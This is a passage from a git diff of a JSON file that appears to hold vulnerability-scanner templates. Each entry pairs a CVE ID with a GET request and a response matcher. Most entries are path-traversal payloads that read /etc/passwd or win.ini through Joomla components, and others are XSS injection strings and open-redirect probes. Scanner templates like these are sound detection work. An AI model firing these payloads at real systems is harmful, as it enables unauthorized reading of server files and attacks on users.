Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1308","info":{"name":"Joomla! Component SVMap 1.1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-1657","info":{"name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1469","info":{"name":"Joomla! Component JProject Manager 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1718","info":{"name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2920","info":{"name":"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1495","info":{"name":"Joomla! Component Matamko 1.01 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2037","info":{"name":"Joomla! Component Percha Downloads Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1875","info":{"name":"Joomla! Component Property - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-2122","info":{"name":"Joomla! Component simpledownload <=0.9.5 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1473","info":{"name":"Joomla! Component Advertising 0.25 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]}]}
\ No newline at end of file
diff --git a/db/db.tar.zst b/db/db.tar.zst
index 6eaaa01b..81b0710e 100644
Binary files a/db/db.tar.zst and b/db/db.tar.zst differ